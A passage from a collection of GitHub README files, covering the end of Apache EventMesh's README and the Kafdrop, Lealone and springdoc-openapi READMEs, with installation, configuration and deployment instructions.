connector-rocketmq (To delete, simply replace `create` with `delete`): ```shell $ make create ``` Run `kubectl get pods` to see if the deployment was successful. 
```shell NAME READY STATUS RESTARTS AGE connector-rocketmq-0 1/1 Running 0 9s eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 3m12s eventmesh-runtime-0-a-0 1/1 Running 0 15s ``` ## Contributing Each contributor has played an important role in promoting the robust development of Apache EventMesh. We sincerely appreciate all contributors who have contributed code and documents. - [Contributing Guideline](https://eventmesh.apache.org/community/contribute/contribute) - [Good First Issues](https://github.com/apache/eventmesh/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) Here is the [List of Contributors](https://github.com/apache/eventmesh/graphs/contributors), thank you all! :) <a href="https://github.com/apache/eventmesh/graphs/contributors"> <img src="https://contrib.rocks/image?repo=apache/eventmesh&max=2000" /> </a> ## CNCF Landscape <div align="center"> <img src="https://landscape.cncf.io/images/left-logo.svg" width="150"/> <img src="https://landscape.cncf.io/images/right-logo.svg" width="200"/> Apache EventMesh enriches the <a href="https://landscape.cncf.io/serverless?license=apache-license-2-0">CNCF Cloud Native Landscape.</a> </div> ## License Apache EventMesh is licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html). ## Community | WeChat Assistant | WeChat Public Account | Slack | |---------------------------------------------------------|--------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------| | <img src="resources/wechat-assistant.jpg" width="128"/> | <img src="resources/wechat-official.jpg" width="128"/> | [Join Slack Chat](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)(Please open an issue if this link is expired) | Bi-weekly meeting : [#Tencent meeting](https://meeting.tencent.com/dm/wes6Erb9ioVV) : 346-6926-0133 Bi-weekly meeting record : [bilibili](https://space.bilibili.com/1057662180) ### Mailing List | Name | Description | Subscribe | Unsubscribe | Archive | |-------------|---------------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------| | Users | User discussion | [Subscribe](mailto:users-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:users-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?users@eventmesh.apache.org) | | Development | Development discussion (Design Documents, Issues, etc.) | [Subscribe](mailto:dev-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?dev@eventmesh.apache.org) | | Commits | Commits to related repositories | [Subscribe](mailto:commits-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:commits-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?commits@eventmesh.apache.org) | | Issues | Issues or PRs comments and reviews | [Subscribe](mailto:issues-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:issues-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?issues@eventmesh.apache.org) |
0
obsidiandynamics/kafdrop
Kafka Web UI
consumer-group consumer-producer docker event-sourcing event-streaming kafka kafka-tools kafka-ui kafka-utils kubernetes pub-sub topic web-ui zookeeper
<img src="https://raw.githubusercontent.com/wiki/obsidiandynamics/kafdrop/images/kafdrop-logo.png" width="90px" alt="logo"/> Kafdrop – Kafka Web UI &nbsp; [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20)
===

[![Price](https://img.shields.io/badge/price-FREE-0098f7.svg)](https://github.com/obsidiandynamics/kafdrop/blob/master/LICENSE)
[![Release with mvn](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml/badge.svg)](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml)
[![Docker](https://img.shields.io/docker/pulls/obsidiandynamics/kafdrop.svg)](https://hub.docker.com/r/obsidiandynamics/kafdrop)
[![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/obsidiandynamics/kafdrop.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/obsidiandynamics/kafdrop/context:java)

<em>Kafdrop is a web UI for viewing Kafka topics and browsing consumer groups.</em> The tool displays information such as brokers, topics, partitions, consumers, and lets you view messages.

![Overview Screenshot](docs/images/overview.png?raw=true)

This project is a reboot of Kafdrop 2.x, dragged kicking and screaming into the world of Java 17+, Kafka 2.x, Helm and Kubernetes. It's a lightweight application that runs on Spring Boot and is dead-easy to configure, supporting SASL and TLS-secured brokers.

# Features

* **View Kafka brokers** — topic and partition assignments, and controller status
* **View topics** — partition count, replication status, and custom configuration
* **Browse messages** — JSON, plain text, Avro and Protobuf encoding
* **View consumer groups** — per-partition parked offsets, combined and per-partition lag
* **Create new topics**
* **View ACLs**
* **Support for Azure Event Hubs**

# Requirements

* Java 17 or newer
* Kafka (version 0.11.0 or newer) or Azure Event Hubs

Optional, additional integration:

* Schema Registry

# Getting Started

You can run the Kafdrop JAR directly, via Docker, or in Kubernetes.

## Running from JAR

```sh
java --add-opens=java.base/sun.nio.ch=ALL-UNNAMED \
    -jar target/kafdrop-<version>.jar \
    --kafka.brokerConnect=<host:port,host:port>,...
```

If unspecified, `kafka.brokerConnect` defaults to `localhost:9092`.

**Note:** As of Kafdrop 3.10.0, a ZooKeeper connection is no longer required. All necessary cluster information is retrieved via the Kafka admin API.

Open a browser and navigate to [http://localhost:9000](http://localhost:9000). The port can be overridden by adding the following config:

```
--server.port=<port> --management.server.port=<port>
```

Optionally, configure a schema registry connection with:

```
--schemaregistry.connect=http://localhost:8081
```

and if you also require basic auth for your schema registry connection you should add:

```
--schemaregistry.auth=username:password
```

Finally, a default message and key format (e.g. to deserialize Avro messages or keys) can optionally be configured as follows:

```
--message.format=AVRO --message.keyFormat=DEFAULT
```

Valid format values are `DEFAULT`, `AVRO`, `PROTOBUF`. This can also be configured at the topic level via dropdown when viewing messages. If key format is unspecified, message format will be used for key too.
## Configure Protobuf Message Type

### Option 1: Using a Protobuf Descriptor

For Protobuf messages, the message definition can be compiled into, and shipped as, a descriptor file. For Kafdrop to decode such messages, the application needs access to the descriptor file(s). Kafdrop lets the user select a descriptor, as well as specify the name of one of the message types provided by that descriptor, at runtime.

To configure a folder containing protobuf descriptor file(s) (`.desc`), add:
```
--protobufdesc.directory=/var/protobuf_desc
```

### Option 2: Using Schema Registry

If no protobuf descriptor file is supplied, Kafdrop will attempt to create the protobuf deserializer using the Schema Registry instead.

### Defaulting to Protobuf

If preferred, the default message format can be set to Protobuf as follows:
```
--message.format=PROTOBUF
```

## Running with Docker

Images are hosted at [hub.docker.com/r/obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop).

Launch container in background:
```sh
docker run -d --rm -p 9000:9000 \
    -e KAFKA_BROKERCONNECT=<host:port,host:port> \
    -e SERVER_SERVLET_CONTEXTPATH="/" \
    obsidiandynamics/kafdrop
```

Launch container with specific JVM options:
```sh
docker run -d --rm -p 9000:9000 \
    -e KAFKA_BROKERCONNECT=<host:port,host:port> \
    -e JVM_OPTS="-Xms32M -Xmx64M" \
    -e SERVER_SERVLET_CONTEXTPATH="/" \
    obsidiandynamics/kafdrop
```

Launch container in background with protobuf definitions:
```sh
docker run -d --rm -v <path_to_protobuf_descriptor_files>:/var/protobuf_desc -p 9000:9000 \
    -e KAFKA_BROKERCONNECT=<host:port,host:port> \
    -e SERVER_SERVLET_CONTEXTPATH="/" \
    -e CMD_ARGS="--message.format=PROTOBUF --protobufdesc.directory=/var/protobuf_desc" \
    obsidiandynamics/kafdrop
```

Then access the web UI at [http://localhost:9000](http://localhost:9000).

> **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop) the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it.

## Running in Kubernetes (using a Helm Chart)

Clone the repository (if necessary):
```sh
git clone https://github.com/obsidiandynamics/kafdrop && cd kafdrop
```

Apply the chart:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
    --set kafka.brokerConnect=<host:port,host:port> \
    --set server.servlet.contextPath="/" \
    --set cmdArgs="--message.format=AVRO --schemaregistry.connect=http://localhost:8080" \ #optional
    --set jvm.opts="-Xms32M -Xmx64M"
```

For all Helm configuration options, have a peek into [chart/values.yaml](chart/values.yaml).

Replace `3.x.x` with the image tag of [obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop). Services will be bound on port 9000 by default (node port 30900).

**Note:** The context path _must_ begin with a slash.

Proxy to the Kubernetes cluster:
```sh
kubectl proxy
```

Navigate to [http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy](http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy).

### Protobuf support via Helm chart

To install with protobuf support, a "facility" option is provided for the deployment: it mounts the descriptor files folder and passes the required CMD arguments, via the option _mountProtoDesc_.
Example:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
    --set kafka.brokerConnect=<host:port,host:port> \
    --set server.servlet.contextPath="/" \
    --set mountProtoDesc.enabled=true \
    --set mountProtoDesc.hostPath="<path/to/desc/folder>" \
    --set jvm.opts="-Xms32M -Xmx64M"
```

## Building

After cloning the repository, building is just a matter of running a standard Maven build:
```sh
mvn clean package
```

The following command will generate a Docker image:
```sh
mvn assembly:single docker:build
```

## Docker Compose

There is a `docker-compose.yaml` file that bundles a Kafka/ZooKeeper instance with Kafdrop:
```sh
cd docker-compose/kafka-kafdrop
docker-compose up
```

# APIs

## JSON endpoints

Starting with version 2.0.0, Kafdrop offers a set of Kafka APIs that mirror the existing HTML views. Any existing endpoint can be returned as JSON by setting the `Accept: application/json` header. Some endpoints are JSON only:

* `/topic`: Returns a list of all topics.

## OpenAPI Specification (OAS)

To help document the Kafka APIs, an OpenAPI Specification (OAS) is included. The OpenAPI Specification output is available by default at the following Kafdrop URL:
```
/v3/api-docs
```

It is also possible to access the Swagger UI (the HTML views) at the following URL:
```
/swagger-ui.html
```

This can be overridden with the following configuration:
```
springdoc.api-docs.path=/new/oas/path
```

You can disable OpenAPI Specification output with the following configuration:
```
springdoc.api-docs.enabled=false
```

## CORS Headers

Starting in version 2.0.0, Kafdrop sets CORS headers for all endpoints. You can control the CORS header values with the following configurations:
```
cors.allowOrigins (default is *)
cors.allowMethods (default is GET,POST,PUT,DELETE)
cors.maxAge (default is 3600)
cors.allowCredentials (default is true)
cors.allowHeaders (default is Origin,Accept,X-Requested-With,Content-Type,Access-Control-Request-Method,Access-Control-Request-Headers,Authorization)
```

You can also disable CORS entirely with the following configuration:
```
cors.enabled=false
```

## Topic Configuration

By default, topics can be deleted. If you don't want this feature, you can disable it with:
```
--topic.deleteEnabled=false
```

By default, topics can be created. If you don't want this feature, you can disable it with:
```
--topic.createEnabled=false
```

## Actuator

Health and info endpoints are available at the following path: `/actuator`

This can be overridden with the following configuration:
```
management.endpoints.web.base-path=<path>
```

# Guides

## Connecting to a Secure Broker

Kafdrop supports TLS (SSL) and SASL connections for [encryption and authentication](http://kafka.apache.org/090/documentation.html#security). This can be configured by providing a combination of the following files (placed into the Kafka root directory):

* `kafka.truststore.jks`: specifies the certificate for authenticating brokers, if TLS is enabled.
* `kafka.keystore.jks`: specifies the private key to authenticate the client to the broker, if mutual TLS authentication is required.
* `kafka.properties`: specifies the necessary configuration, including key/truststore passwords, cipher suites, enabled TLS protocol versions, username/password pairs, etc.

When supplying the truststore and/or keystore files, the `ssl.truststore.location` and `ssl.keystore.location` properties will be assigned automatically.
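For context, here is a minimal, illustrative Java sketch (not Kafdrop's implementation; the broker address and file paths are placeholders) of how the same three files come together as client properties on a plain Kafka admin client:

```java
import java.io.FileInputStream;
import java.io.IOException;
import java.util.Properties;
import java.util.concurrent.ExecutionException;

import org.apache.kafka.clients.admin.AdminClient;
import org.apache.kafka.clients.admin.AdminClientConfig;

public class SecureClientSketch {
    public static void main(String[] args)
            throws IOException, ExecutionException, InterruptedException {
        Properties props = new Properties();
        // kafka.properties carries security.protocol, the SASL JAAS config,
        // key/truststore passwords, cipher suites, etc. (path is a placeholder)
        try (FileInputStream in = new FileInputStream("kafka.properties")) {
            props.load(in);
        }
        props.put(AdminClientConfig.BOOTSTRAP_SERVERS_CONFIG, "broker1:9093"); // placeholder
        // Kafdrop assigns these two automatically when the JKS files are supplied;
        // a standalone client would set them explicitly:
        props.putIfAbsent("ssl.truststore.location", "kafka.truststore.jks");
        props.putIfAbsent("ssl.keystore.location", "kafka.keystore.jks");
        try (AdminClient admin = AdminClient.create(props)) {
            System.out.println("Cluster ID: " + admin.describeCluster().clusterId().get());
        }
    }
}
```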
### Using Docker

The three files above can be supplied to a Docker instance in base-64-encoded form via environment variables:

```sh
docker run -d --rm -p 9000:9000 \
    -e KAFKA_BROKERCONNECT=<host:port,host:port> \
    -e KAFKA_PROPERTIES="$(cat kafka.properties | base64)" \
    -e KAFKA_TRUSTSTORE="$(cat kafka.truststore.jks | base64)" \   # optional
    -e KAFKA_KEYSTORE="$(cat kafka.keystore.jks | base64)" \       # optional
    obsidiandynamics/kafdrop
```

Rather than passing `KAFKA_PROPERTIES` as a base64-encoded string, you can also place a pre-populated `KAFKA_PROPERTIES_FILE` into the container:

```sh
cat << EOF > kafka.properties
security.protocol=SASL_SSL
sasl.mechanism=SCRAM-SHA-512
sasl.jaas.config=org.apache.kafka.common.security.scram.ScramLoginModule required username="foo" password="bar"
EOF

docker run -d --rm -p 9000:9000 \
    -v $(pwd)/kafka.properties:/tmp/kafka.properties:ro \
    -v $(pwd)/kafka.truststore.jks:/tmp/kafka.truststore.jks:ro \
    -v $(pwd)/kafka.keystore.jks:/tmp/kafka.keystore.jks:ro \
    -e KAFKA_BROKERCONNECT=<host:port,host:port> \
    -e KAFKA_PROPERTIES_FILE=/tmp/kafka.properties \
    -e KAFKA_TRUSTSTORE_FILE=/tmp/kafka.truststore.jks \   # optional
    -e KAFKA_KEYSTORE_FILE=/tmp/kafka.keystore.jks \       # optional
    obsidiandynamics/kafdrop
```

#### Environment Variables

##### Basic configuration

|Name |Description
|----------------------------|-------------------------------
|`KAFKA_BROKERCONNECT` |Bootstrap list of Kafka host/port pairs. Defaults to `localhost:9092`.
|`KAFKA_PROPERTIES` |Additional properties to configure the broker connection (base-64 encoded).
|`KAFKA_TRUSTSTORE` |Certificate for broker authentication (base-64 encoded). Required for TLS/SSL.
|`KAFKA_KEYSTORE` |Private key for mutual TLS authentication (base-64 encoded).
|`SERVER_SERVLET_CONTEXTPATH`|The context path to serve requests on (must end with a `/`). Defaults to `/`.
|`SERVER_PORT` |The web server port to listen on. Defaults to `9000`.
|`MANAGEMENT_SERVER_PORT` |The Spring Actuator server port to listen on. Defaults to `9000`.
|`SCHEMAREGISTRY_CONNECT` |The endpoint of the Schema Registry for Avro or Protobuf messages.
|`SCHEMAREGISTRY_AUTH` |Optional basic auth credentials in the form `username:password`.
|`CMD_ARGS` |Command line arguments to Kafdrop, e.g. `--message.format` or `--protobufdesc.directory` or `--server.port`.

##### Advanced configuration

| Name |Description
|--------------------------|-------------------------------
| `JVM_OPTS` |JVM options, e.g. `-Xms16M -Xmx64M -Xss360K -XX:-TieredCompilation -XX:+UseStringDeduplication -noverify`.
| `JMX_PORT` |Port to use for JMX. No default; if unspecified, JMX will not be exposed.
| `HOST` |The hostname to report for the RMI registry (used for JMX). Defaults to `localhost`.
| `KAFKA_PROPERTIES_FILE` |Internal location where the Kafka properties file will be written to (if `KAFKA_PROPERTIES` is set). Defaults to `kafka.properties`.
| `KAFKA_TRUSTSTORE_FILE` |Internal location where the truststore file will be written to (if `KAFKA_TRUSTSTORE` is set). Defaults to `kafka.truststore.jks`.
| `KAFKA_KEYSTORE_FILE` |Internal location where the keystore file will be written to (if `KAFKA_KEYSTORE` is set). Defaults to `kafka.keystore.jks`.
| `SSL_ENABLED` | Enables HTTPS (SSL) for the Kafdrop server. Default is `false`.
| `SSL_KEY_STORE_TYPE` | Type of SSL keystore. Default is `PKCS12`.
| `SSL_KEY_STORE` | Path to the keystore file.
| `SSL_KEY_STORE_PASSWORD` | Keystore password.
| `SSL_KEY_ALIAS` | Key alias.

### Using Helm

Like in the Docker example, supply the files in base-64 form:

```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
    --set kafka.brokerConnect=<host:port,host:port> \
    --set kafka.properties="$(cat kafka.properties | base64)" \
    --set kafka.truststore="$(cat kafka.truststore.jks | base64)" \
    --set kafka.keystore="$(cat kafka.keystore.jks | base64)"
```

## Updating the Bootstrap theme

Edit the `.scss` files in the `theme` directory, then run `theme/install.sh`. This will overwrite `src/main/resources/static/css/bootstrap.min.css`. Then build as usual. (Requires `npm`.)

## Securing the Kafdrop UI

Kafdrop doesn't (yet) natively implement an authentication mechanism to restrict user access. Here's a quick workaround using NGINX with Basic Auth. The instructions below are for macOS and Homebrew.

### Requirements

* NGINX: install using `which nginx > /dev/null || brew install nginx`
* Apache HTTP utilities: `which htpasswd > /dev/null || brew install httpd`

### Setup

Set the admin password (you will be prompted):
```sh
htpasswd -c /usr/local/etc/nginx/.htpasswd admin
```

Add a logout page in `/usr/local/opt/nginx/html/401.html`:
```html
<!DOCTYPE html>
<p>Not authorized. <a href="<!--# echo var="scheme" -->://<!--# echo var="http_host" -->/">Login</a>.</p>
```

Use the following snippet for `/usr/local/etc/nginx/nginx.conf`:
```
worker_processes 4;

events {
  worker_connections 1024;
}

http {
  upstream kafdrop {
    server 127.0.0.1:9000;
    keepalive 64;
  }

  server {
    listen *:8080;
    server_name _;
    access_log /usr/local/var/log/nginx/nginx.access.log;
    error_log /usr/local/var/log/nginx/nginx.error.log;
    auth_basic "Restricted Area";
    auth_basic_user_file /usr/local/etc/nginx/.htpasswd;

    location / {
      proxy_pass http://kafdrop;
    }

    location /logout {
      return 401;
    }

    error_page 401 /errors/401.html;

    location /errors {
      auth_basic off;
      ssi on;
      alias /usr/local/opt/nginx/html;
    }
  }
}
```

Run NGINX:
```sh
nginx
```

Or reload its configuration if already running:
```sh
nginx -s reload
```

To log out, browse to [/logout](http://localhost:8080/logout).

> **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop) the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it.

# Contributing Guidelines

See [here](CONTRIBUTING.md).

## Release workflow

To cut an official release, these are the steps:

1. Commit a new version on master that has the `-SNAPSHOT` suffix stripped (see `pom.xml`). Once the commit is merged, the CI will treat it as a release build and will publish more artifacts than the regular (non-release/snapshot) build. One of those is a Docker Hub push to the specific version tag and the "latest" tag. (The regular build doesn't update "latest".)

2. You can then edit the release description in GitHub to describe what went into the release.

3. After the release goes through successfully, prepare the repo for the next version by committing the next snapshot version on master: increment the minor version and add the `-SNAPSHOT` suffix again.
0
lealone/Lealone
An OLTP relational database and document database that is 10x faster than MySQL and MongoDB
acid async database lealone microservice newsql oltp orm rdbms replication sharding sql
### What is Lealone

* A high-performance relational database for OLTP workloads
* Also a high-performance, MongoDB-compatible document database
* Highly compatible with the MySQL and PostgreSQL protocols and SQL dialects

### Lealone Features

##### Highlight features

* Extremely fast concurrent write performance
* Fully asynchronous end to end; a small number of threads can handle massive concurrency
* A pausable, incremental SQL engine
* Preemptive scheduling based on SQL priority, so slow queries cannot hog the CPU for long
* Creating a JDBC connection is very fast and uses few resources, so a JDBC connection pool is no longer needed
* Pluggable storage engine architecture, with the built-in AOSE engine based on a novel asynchronous B-Tree
* Pluggable transaction engine architecture that separates transaction logic from storage, with the built-in AOTE engine
* Hybrid row/column storage at the page level; for tables with many columns, reading only a few of them saves a lot of memory
* Hostable backend services created via the CREATE SERVICE statement
* Runs from a single jar under 2 MB, with no installation required

##### Standard features

* Indexes, views, joins, subqueries, triggers, user-defined functions, ORDER BY, GROUP BY, and aggregation

##### Cloud edition

* High-performance distributed transactions, strongly consistent replication, and global snapshot isolation
* Automatic sharding: users need not care about sharding rules, there are no hotspots, and range queries are supported
* Four mixed deployment modes: embedded, client/server, replication, and sharding
* Fast manual or automatic mode transitions with no downtime: client/server mode -> replication mode -> sharding mode

### Lealone Documentation

* [Quick start](https://github.com/lealone/Lealone-Docs/blob/master/应用文档/Lealone数据库快速入门.md)
* [Documentation home](https://github.com/lealone/Lealone-Docs)

### Lealone Plugins

* Plugins compatible with MongoDB, MySQL, and PostgreSQL
* [Plugins home](https://github.com/lealone-plugins)

### Lealone Microservice Framework

* A novel microservice framework built on database technology; developing distributed microservice applications is as simple as developing a monolith
* [Microservice framework docs](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-%E5%BE%AE%E6%9C%8D%E5%8A%A1%E6%A1%86%E6%9E%B6)

### Lealone ORM Framework

* An ultra-concise, type-safe ORM framework that needs no configuration files or annotations
* [ORM framework docs](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-orm-%E6%A1%86%E6%9E%B6)

### Origin of the Name

* Lealone is pronounced ['li:ləʊn]; it is an English word I coined, inspired by the scindapsus ("lv luo" in pinyin) plants on my office desk, after which I had long wanted to name a project. "lv luo" sounds somewhat like Lealone, which is a combination of lea + lone, and it is even more interesting read backwards. :)

### Lealone History

* Started in 2012 from the codebase of the [H2 database](http://www.h2database.com/html/main.html)
* [The past, present and future of Lealone](https://github.com/codefollower/My-Blog/issues/16)

### [Lealone License](https://github.com/lealone/Lealone/blob/master/LICENSE.md)
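As an illustration of the fast, pool-free JDBC connections highlighted above, here is a minimal sketch; the connection URL, port and credentials are assumptions for illustration only (see the quick-start guide above for the exact connection string):

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class LealoneHello {
    public static void main(String[] args) throws Exception {
        // URL and credentials are assumptions for this sketch; consult the
        // quick-start guide for the actual values of your deployment.
        String url = "jdbc:lealone:tcp://localhost:9210/lealone";
        try (Connection conn = DriverManager.getConnection(url, "root", "");
             Statement stmt = conn.createStatement()) {
            stmt.execute("CREATE TABLE IF NOT EXISTS test (id INT PRIMARY KEY, name VARCHAR)");
            stmt.execute("INSERT INTO test VALUES (1, 'hello')");
            try (ResultSet rs = stmt.executeQuery("SELECT name FROM test WHERE id = 1")) {
                while (rs.next()) {
                    System.out.println(rs.getString(1));
                }
            }
        }
    }
}
```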
0
springdoc/springdoc-openapi
Library for OpenAPI 3 with spring-boot
java json-format kotlin oauth2 openapi openapi-spec openapi-specification openapi3 rest-api spring spring-boot spring-data-rest spring-hateoas spring-security spring-webflux springdoc-openapi swagger swagger-documentation swagger-ui yaml-format
![Octocat](https://springdoc.org/img/banner-logo.svg)

[![Build Status](https://ci-cd.springdoc.org:8443/buildStatus/icon?job=springdoc-openapi-starter-IC)](https://ci-cd.springdoc.org:8443/view/springdoc-openapi/job/springdoc-openapi-starter-IC/)
[![Quality Gate](https://sonarcloud.io/api/project_badges/measure?project=springdoc_springdoc-openapi&metric=alert_status)](https://sonarcloud.io/dashboard?id=springdoc_springdoc-openapi)
[![Known Vulnerabilities](https://snyk.io/test/github/springdoc/springdoc-openapi.git/badge.svg)](https://snyk.io/test/github/springdoc/springdoc-openapi.git)
[![Stack Exchange questions](https://img.shields.io/stackexchange/stackoverflow/t/springdoc)](https://stackoverflow.com/questions/tagged/springdoc?tab=Votes)

IMPORTANT: ``springdoc-openapi v1.8.0`` is the latest Open Source release supporting Spring Boot 2.x and 1.x. Extended support for the [*springdoc-openapi v1*](https://springdoc.org/v1) project is available for organizations that need support beyond 2023. For more details, feel free to reach out: [sales@springdoc.org](mailto:sales@springdoc.org)

``springdoc-openapi`` is on [Open Collective](https://opencollective.com/springdoc). If you ❤️ this project, consider becoming a [sponsor](https://github.com/sponsors/springdoc).

This project is sponsored by

<p align="center">
<a href="https://opensource.mercedes-benz.com/" target="_blank">
<img src="https://springdoc.org/img/mercedes-benz.png" height="10%" width="10%" />
</a>
&nbsp;&nbsp;
<a href="https://www.dm-jobs.com/dmTECH/?locale=de_DE&wt_mc=.display.github.sponsoring.logo" target="_blank">
<img src="https://springdoc.org/img/dmTECH_Logo.jpg" height="10%" width="10%" />
</a>
<a href="https://www.contrastsecurity.com/" target="_blank">
<img src="https://springdoc.org/img/contrastsecurity.svg" height="10%" width="30%" />
</a>
</p>

# Table of Contents

- [Full documentation](#full-documentation)
- [**Introduction**](#introduction)
- [**Getting Started**](#getting-started)
- [Library for springdoc-openapi integration with spring-boot and swagger-ui](#library-for-springdoc-openapi-integration-with-spring-boot-and-swagger-ui)
- [Spring-boot with OpenAPI Demo applications.](#spring-boot-with-openapi-demo-applications)
- [Source Code for Demo Applications.](#source-code-for-demo-applications)
- [Demo Spring Boot 2 Web MVC with OpenAPI 3.](#demo-spring-boot-2-web-mvc-with-openapi-3)
- [Demo Spring Boot 2 WebFlux with OpenAPI 3.](#demo-spring-boot-2-webflux-with-openapi-3)
- [Demo Spring Boot 2 WebFlux with Functional endpoints OpenAPI 3.](#demo-spring-boot-2-webflux-with-functional-endpoints-openapi-3)
- [Demo Spring Boot 2 and Spring Hateoas with OpenAPI 3.](#demo-spring-boot-2-and-spring-hateoas-with-openapi-3)
- [Integration of the library in a Spring Boot 3.x project without the swagger-ui:](#integration-of-the-library-in-a-spring-boot-3x-project-without-the-swagger-ui)
- [Error Handling for REST using @ControllerAdvice](#error-handling-for-rest-using-controlleradvice)
- [Adding API Information and Security documentation](#adding-api-information-and-security-documentation)
- [spring-webflux support with Annotated Controllers](#spring-webflux-support-with-annotated-controllers)
- [Acknowledgements](#acknowledgements)
- [Contributors](#contributors)
- [Additional Support](#additional-support)

# [Full documentation](https://springdoc.org/)

# **Introduction**

The springdoc-openapi Java library helps automate the generation of API documentation for Spring Boot projects.
springdoc-openapi works by examining an application at runtime to infer API semantics based on Spring configurations, class structure and various annotations. The library automatically generates documentation in JSON/YAML and HTML-formatted pages. The generated documentation can be complemented using `swagger-api` annotations.

This library supports:
* OpenAPI 3
* Spring-boot v3 (Java 17 & Jakarta EE 9)
* JSR-303, specifically for @NotNull, @Min, @Max, and @Size.
* Swagger-ui
* OAuth 2
* GraalVM native images

The following video introduces the library:
* [https://youtu.be/utRxyPfFlDw](https://youtu.be/utRxyPfFlDw)

For *spring-boot v3* support, make sure you use [springdoc-openapi v2](https://springdoc.org/).

This is a community-based project, not maintained by the Spring Framework Contributors (Pivotal).

# **Getting Started**

## Library for springdoc-openapi integration with spring-boot and swagger-ui

* Automatically deploys swagger-ui to a Spring Boot 3.x application
* Documentation will be available in HTML format, using the official [swagger-ui jars](https://github.com/swagger-api/swagger-ui.git).
* The Swagger UI page will then be available at http://server:port/context-path/swagger-ui.html and the OpenAPI description will be available at the following url for json format: http://server:port/context-path/v3/api-docs
  * `server`: The server name or IP
  * `port`: The server port
  * `context-path`: The context path of the application
* Documentation is available in yaml format as well, at the following path: `/v3/api-docs.yaml`
* Add the `springdoc-openapi-starter-webmvc-ui` library to the list of your project dependencies (no additional configuration is needed):

```xml
   <dependency>
      <groupId>org.springdoc</groupId>
      <artifactId>springdoc-openapi-starter-webmvc-ui</artifactId>
      <version>last-release-version</version>
   </dependency>
```

* This step is optional: for a custom path of the swagger documentation in HTML format, add a custom springdoc property in your spring-boot configuration file:

```properties
# swagger-ui custom path
springdoc.swagger-ui.path=/swagger-ui.html
```

## Spring-boot with OpenAPI Demo applications.

### [Source Code for Demo Applications](https://github.com/springdoc/springdoc-openapi-demos/tree/master).

## [Demo Spring Boot 3 Web MVC with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webmvc).
## [Demo Spring Boot 3 WebFlux with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux/swagger-ui.html).
## [Demo Spring Boot 3 WebFlux with Functional endpoints OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux-functional/swagger-ui.html).
## [Demo Spring Boot 3 and Spring Cloud Function Web MVC](https://demos.springdoc.org/spring-cloud-function-webmvc).
## [Demo Spring Boot 3 and Spring Cloud Function WebFlux](http://158.101.191.70:8085/swagger-ui.html).
## [Demo Spring Boot 3 and Spring Cloud Gateway](https://demos.springdoc.org/demo-microservices/swagger-ui.html).

![Branching](https://springdoc.org/img/pets.png)

## Integration of the library in a Spring Boot 3.x project without the swagger-ui:

* Documentation will be available at the following url for json format: http://server:port/context-path/v3/api-docs
  * `server`: The server name or IP
  * `port`: The server port
  * `context-path`: The context path of the application
* Documentation will be available in yaml format as well, on the following path: `/v3/api-docs.yaml`
* Add the library to the list of your project dependencies (no additional configuration is needed):

```xml
   <dependency>
      <groupId>org.springdoc</groupId>
      <artifactId>springdoc-openapi-starter-webmvc-api</artifactId>
      <version>last-release-version</version>
   </dependency>
```

* This step is optional: for a custom path of the OpenAPI documentation in Json format, add a custom springdoc property in your spring-boot configuration file:

```properties
